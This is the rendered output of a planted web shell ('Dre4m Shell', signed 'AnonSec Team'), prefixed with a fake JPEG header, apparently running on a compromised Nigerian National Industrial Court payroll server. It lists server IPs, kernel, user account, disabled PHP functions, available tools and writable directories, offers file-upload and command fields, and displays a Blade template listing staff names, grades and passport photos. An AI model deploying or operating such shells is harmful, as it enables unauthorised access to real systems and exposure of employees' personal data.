ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 18.224.64.28
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/npay.pdf.nicn.gov.ng/resources/views/pictureViewer/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/npay.pdf.nicn.gov.ng/resources/views/pictureViewer/display.blade.php
@extends('layouts.layout')

@section('pageTitle')
 FEDERAL GOVERNMENT OF NIGERIA
	PAYMENT VOUCHER
@endsection

@section('content')
<div align="left" style="padding:0 2%;">
    <form method="post" action="{{ url('/approve') }}">
        <div class="row">
            <div class="col-md-12">
                <div align="center"><h2><strong>NATIONAL INDUSTRIAL COURT OF NIGERIA PAYROLL</strong></h2></div>
            </div>
        </div>
        <hr />
      <div align="left">
            <div>PAYROLL P.V. No: </div>
      </div>
      <br />
      <div align="left"> 
            <div>MINISTRY/DEPARTMENT: NATIONAL INDUSTRIAL COURT OF NIGERIA, {{$curDivision}} </div>
      </div>
      <br />
      <div align="left">
            <div>BANK: {{$bankName->bank}} DIVISION</div>
      </div>
      <br />
      <div align="center">
            <div><strong>All Staff With Display Picture</strong></div>
      </div>
      <br />
      <div class="row">
        {{ csrf_field() }}
        <div class="col-md-12">
          
          <table class="table table-responsive table-bordered table-striped">
              <thead>
                    <tr>
                        <th><div align="center">FILE NO</div></th>
                        <th><div align="center">STAFF FULL NAME</div></th>
                        <th><div align="center">GRADE</div></th>
                        <th><div align="center">STEP</div></th>
                        <th><div align="center">PICTURE</div></th>
                    </tr>
              <thead>
              <tbody>
               @foreach($displayPicture as $display)
                    <tr>
                        <td class="text-center">{{$display -> fileNo}}</td>
                        <td class="text-left">{{$display -> surname .' '. $display -> first_name .' '. $display -> othernames}}</td>
                        <td class="text-center">{{$display -> grade}}</td>
                        <td class="text-center">{{$display -> step}}</td>
                        <td class="text-center">
                            <a href="#" title="{{$display -> surname .' '. $display -> first_name .' '. $display -> othernames}}">
                                <img src="{{asset('passport/' . $display -> fileNo . '.jpg')}}" height="40" data-toggle="modal" data-target="#myModal{{$display -> fileNo}}"  />
                            </a> 
                        </td>
                    </tr>
                    <div id="myModal{{$display -> fileNo}}" class="modal fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
                        <div class="modal-dialog">
                            <div class="modal-content">
                                <div class="modal-body">
                                    <img src="{{asset('passport/' . $display -> fileNo . '.jpg')}}" class="img-responsive">
                                </div>
                            </div>
                        </div>
                    </div>
             @endforeach
                    <tr>
                        <td colspan="6">
                        <div align="left">
                            {{'TOTAL STAFF: ' . $total}}
                        </div>
                        </td>
                    </tr>
              </tbody>
        </table>
    </div>
    </div>
    <br/>
    <br/>
    </form>
  </div><!--end main div=center-->
@endsection











Anon7 - 2022
AnonSec Team